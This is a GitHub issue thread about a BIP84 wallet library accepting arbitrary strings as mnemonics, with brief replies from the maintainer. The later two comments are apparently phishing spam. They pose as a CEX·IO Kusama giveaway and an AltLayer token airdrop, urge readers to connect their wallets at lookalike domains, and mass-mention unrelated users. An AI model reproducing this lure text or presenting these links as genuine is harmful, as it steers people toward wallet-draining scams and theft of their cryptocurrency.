### ISSUE TITLE
big mnemonic confusion

### ISSUE THREAD

**Issue by xprv17** [Anderson-Juhasc/bip84#10]
Hello Anderson,

I got a question regarding this code:

const mnemonic = 'blablablablabla'
var root = new BIP84.fromMnemonic(mnemonic)
var child0 = root.deriveAccount(0)
var account0 = new BIP84.fromZPrv(child0)
var addr = account0.getAddress(0);
console.log(addr);

Whatever I wrote in mnemonic const I will get the same return of public address. I know my question will be very dumb but I thought it will not work without mnemonic words (those 12 words etc)!? How can I write basically a sentence and get every time the same return of bc1...? I thought thats working only with words

**Comment by Anderson-Juhasc** [comment]
@random9brat well, I think we need improve the code to validity mnemonics or it could work with sentences too, what do you think?

**Comment by Anderson-Juhasc** [comment]
@random9brat using mnemonic is better because of combination of the words(and follow the right BIP39) and you can pass a password too.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by KnollElias** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

Mercy-Li, @apravink, @reConNico, @ranajahanzaib, @nicehorse06, @nszumowski, @gitmeteor, @Los-had, @Anchith23, @Jeordman, @devzyf, @zahidshaikh08, @fengwo, @youngqqcn, @phellipeandrade, @rjhartl, @poontangrcds, @luohaoyuan, @jinsley8, @anatolinicolae
